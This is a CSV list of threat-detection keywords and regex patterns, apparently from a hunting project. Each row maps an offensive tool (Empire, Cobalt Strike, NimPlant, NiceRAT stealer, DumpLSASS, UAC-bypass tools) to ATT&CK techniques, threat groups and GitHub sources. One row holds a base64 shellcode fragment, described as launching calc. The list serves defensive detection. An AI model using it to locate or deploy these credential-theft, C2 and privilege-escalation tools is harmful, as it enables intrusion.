"*egresscheck-framework*",".{0,1000}egresscheck\-framework.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-EgressCheck.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","43027"
"*ehang-io/nps*",".{0,1000}ehang\-io\/nps.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","1","N/A","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","43028"
"*EiD5PDowAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQj*",".{0,1000}EiD5PDowAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQj.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","calc base64 shellcode","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","43031"
"*EiD5PDowAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdCLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI*",".{0,1000}EiD5PDowAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdCLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI.{0,1000}","offensive_tool_keyword","PeriscopeC2","walmart's C2 - complete adversarial operations toolkit (C2 - stagers - agents - automated ephemeral redirectors and task runners - a complete phishing engine)","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/malcomvetter/Periscope","1","0","#content","N/A","9","","N/A","","","","43032"
"*eigblbgjknlfbajkfhopmcojidlgcehm*",".{0,1000}eigblbgjknlfbajkfhopmcojidlgcehm.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","43034"
"*ejabberd2john.py*",".{0,1000}ejabberd2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","43035"
"*ejbalbakoplchlghecdalmeeeajnimhm*",".{0,1000}ejbalbakoplchlghecdalmeeeajnimhm.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","43036"
"*ejjladinnckdgjemekebdpeokbikhfci*",".{0,1000}ejjladinnckdgjemekebdpeokbikhfci.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","43037"
"*eKeys\*-eKeys.txt*",".{0,1000}eKeys\\.{0,1000}\-eKeys\.txt.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","43039"
"*eladshamir/BadWindowsService*",".{0,1000}eladshamir\/BadWindowsService.{0,1000}","offensive_tool_keyword","BadWindowsService","An insecurely implemented and installed Windows service for emulating elevation of privileges vulnerabilities","T1068 - T1211 - T1050","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/eladshamir/BadWindowsService","1","1","N/A","N/A","10","1","58","10","2022-08-25T14:22:25Z","2022-08-19T15:38:05Z","43042"
"*eladshamir/RPC-Backdoor*",".{0,1000}eladshamir\/RPC\-Backdoor.{0,1000}","offensive_tool_keyword","RPC-Backdoor","A basic emulation of an ""RPC Backdoor""","T1071.004","TA0011","N/A","N/A","C2","https://github.com/eladshamir/RPC-Backdoor","1","1","N/A","N/A","10","10","240","45","2022-08-25T14:37:41Z","2022-08-16T13:12:05Z","43043"
"*eladshamir/SharpElevator*",".{0,1000}eladshamir\/SharpElevator.{0,1000}","offensive_tool_keyword","SharpElevator","SharpElevator is a C# implementation of Elevator for UAC bypass","T1548.002 - T1548","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/eladshamir/SharpElevator","1","1","N/A","N/A","10","1","51","12","2022-08-31T18:09:10Z","2022-08-29T19:52:53Z","43044"
"*eldraco/domain_analyzer*",".{0,1000}eldraco\/domain_analyzer.{0,1000}","offensive_tool_keyword","domain_analyzer","Analyze the security of any domain by finding all the information possible","T1560 - T1590 - T1200 - T1213 - T1057","TA0002 - TA0009","N/A","N/A","Reconnaissance","https://github.com/eldraco/domain_analyzer","1","1","N/A","N/A","6","10","1858","241","2022-12-29T10:57:33Z","2017-08-08T18:52:34Z","43047"
"*electrum2john.py*",".{0,1000}electrum2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","43048"
"*elementalsouls/DumpLSASS*",".{0,1000}elementalsouls\/DumpLSASS.{0,1000}","offensive_tool_keyword","DumpLSASS","Lsass dumping tool - 50 ways of dumping lsass","T1003.001 - T1055.001 - T1620","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/elementalsouls/DumpLSASS","1","1","N/A","N/A","10","1","33","5","2024-02-27T11:25:11Z","2023-04-09T12:11:10Z","43049"
"*elevate juicypotato *",".{0,1000}elevate\sjuicypotato\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","43050"
"*elevate Printspoofer*",".{0,1000}elevate\sPrintspoofer.{0,1000}","offensive_tool_keyword","cobaltstrike","Reflection dll implementation of PrintSpoofer used in conjunction with Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/crisprss/PrintSpoofer","1","0","N/A","N/A","10","10","88","12","2021-10-07T17:45:00Z","2021-10-07T17:28:45Z","43051"
"*elevate svc-exe *",".{0,1000}elevate\ssvc\-exe\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","43052"
"*ElevatePrivs*",".{0,1000}ElevatePrivs.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","43054"
"*Elevating to SYSTEM via token duplication for LSA secret retrieval*",".{0,1000}Elevating\sto\sSYSTEM\svia\stoken\sduplication\sfor\sLSA\ssecret\sretrieval.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#content","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","43055"
"*elevationstation.cpp*",".{0,1000}elevationstation\.cpp.{0,1000}","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","N/A","4","368","45","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z","43056"
"*elevationstation.exe*",".{0,1000}elevationstation\.exe.{0,1000}","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","N/A","4","368","45","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z","43057"
"*elevationstation.git*",".{0,1000}elevationstation\.git.{0,1000}","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","N/A","4","368","45","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z","43058"
"*elevationstation.sln*",".{0,1000}elevationstation\.sln.{0,1000}","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","N/A","4","368","45","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z","43059"
"*elevationstation-main*",".{0,1000}elevationstation\-main.{0,1000}","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","N/A","4","368","45","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z","43060"
"*elevator.exe *cmd.exe*",".{0,1000}elevator\.exe\s.{0,1000}cmd\.exe.{0,1000}","offensive_tool_keyword","Elevator","UAC bypass by abusing RPC and debug objects.","T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Kudaes/Elevator","1","0","N/A","N/A","10","7","614","69","2023-10-19T08:51:09Z","2022-08-25T21:39:28Z","43061"
"*ElevenPaths*FOCA*",".{0,1000}ElevenPaths.{0,1000}FOCA.{0,1000}","offensive_tool_keyword","FOCA","FOCA is a tool used mainly to find metadata and hidden information in the documents it scans. These documents may be on web pages. and can be downloaded and analysed with FOCA.It is capable of analysing a wide variety of documents. with the most common being Microsoft Office. Open Office. or PDF files. although it also analyses Adobe InDesign or SVG files. for instance.","T1556 - T1566 - T1213 - T1212 - T1565","TA0005 - TA0009","N/A","N/A","Reconnaissance","https://github.com/ElevenPaths/FOCA","1","0","N/A","N/A","N/A","10","3160","575","2022-12-08T09:31:55Z","2017-10-02T17:05:06Z","43062"
"*ELFLoader.c*",".{0,1000}ELFLoader\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","This is a ELF object in memory loader/runner. The goal is to create a single elf loader that can be used to run follow on capabilities across all x86_64 and x86 nix operating systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/ELFLoader","1","1","N/A","N/A","10","10","268","45","2022-05-16T17:48:40Z","2022-04-26T19:18:20Z","43064"
"*ELFLoader.h*",".{0,1000}ELFLoader\.h.{0,1000}","offensive_tool_keyword","cobaltstrike","This is a ELF object in memory loader/runner. The goal is to create a single elf loader that can be used to run follow on capabilities across all x86_64 and x86 nix operating systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/ELFLoader","1","1","N/A","N/A","10","10","268","45","2022-05-16T17:48:40Z","2022-04-26T19:18:20Z","43065"
"*ELFLoader.out*",".{0,1000}ELFLoader\.out.{0,1000}","offensive_tool_keyword","cobaltstrike","This is a ELF object in memory loader/runner. The goal is to create a single elf loader that can be used to run follow on capabilities across all x86_64 and x86 nix operating systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/ELFLoader","1","1","N/A","N/A","10","10","268","45","2022-05-16T17:48:40Z","2022-04-26T19:18:20Z","43066"
"*EliteLoser/PSnmap*",".{0,1000}EliteLoser\/PSnmap.{0,1000}","offensive_tool_keyword","Psnmap","Powershell scanner (nmap like)","T1086 - T1046 - T1059","TA0007","N/A","Black Basta","Discovery","https://github.com/KurtDeGreeff/PlayPowershell/blob/master/PSnmap.ps1","1","1","N/A","N/A","7","2","178","64","2024-08-23T18:24:20Z","2015-01-24T10:46:41Z","43068"
"*elite-proxy-finder*",".{0,1000}elite\-proxy\-finder.{0,1000}","offensive_tool_keyword","elite-proxy-finder","Finds elite anonymity (L1) HTTP proxies then tests them all in parallel. Tests each proxy against 3 IP checking URLs including one which is HTTPS to make sure it can handle HTTPS requests. Then checks the proxy headers to confirm its an elite L1 proxy that will not leak any extra info. By default the script will only print the proxy IP. request time. and country code of proxies that pass all four tests but you can see all the results including errors in any of the tests with the -a (--all) option.","T1586.001 - T1041.002 - T1105.002 - T1573.001 - T1135.002 - T1134.002 - T1016.001","TA0011 - TA0010 - TA0005 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/DanMcInerney/elite-proxy-finder","1","1","N/A","N/A","N/A","3","251","96","2016-11-23T10:31:33Z","2014-04-17T11:23:20Z","43069"
"*ElJaviLuki/CobaltStrike_OpenBeacon*",".{0,1000}ElJaviLuki\/CobaltStrike_OpenBeacon.{0,1000}","offensive_tool_keyword","cobaltstrike","alternative to the Cobalt Strike Beacon","T1071.001 - T1041 - T1219 - T1105","TA0011","N/A","N/A","C2","https://github.com/ElJaviLuki/CobaltStrike_OpenBeacon","1","1","N/A","N/A","10","10","225","40","2024-03-13T04:32:57Z","2023-12-27T18:37:46Z","43070"
"*ellen0xffff@proton.me*",".{0,1000}ellen0xffff\@proton\.me.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","43071"
"*ElliotKillick/LdrLockLiberator*",".{0,1000}ElliotKillick\/LdrLockLiberator.{0,1000}","offensive_tool_keyword","LdrLockLiberator","LdrLockLiberator is a collection of techniques for escaping or otherwise forgoing Loader Lock while executing your code from DllMain or anywhere else the lock may be present.","T1574.002 - T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/ElliotKillick/LdrLockLiberator","1","1","N/A","N/A","9","4","375","65","2024-10-29T23:05:45Z","2023-10-31T10:11:16Z","43072"
"*elnerd/Get-NetNTLM*",".{0,1000}elnerd\/Get\-NetNTLM.{0,1000}","offensive_tool_keyword","Get-NetNTLM","Powershell module to get the NetNTLMv2 hash of the current user","T1110.003 - T1557.001 - T1040","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/elnerd/Get-NetNTLM","1","1","N/A","N/A","7","1","93","18","2022-07-05T20:55:33Z","2019-02-11T23:09:54Z","43073"
"*elusiveMice.x64.o*",".{0,1000}elusiveMice\.x64\.o.{0,1000}","offensive_tool_keyword","ElusiveMice","Cobalt Strike User-Defined Reflective Loader with AV/EDR Evasion in mind","T1620 - T1055.012 - T1202","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/mgeeky/ElusiveMice","1","1","N/A","N/A","10","5","449","78","2023-07-12T17:54:07Z","2021-08-27T19:22:20Z","43074"
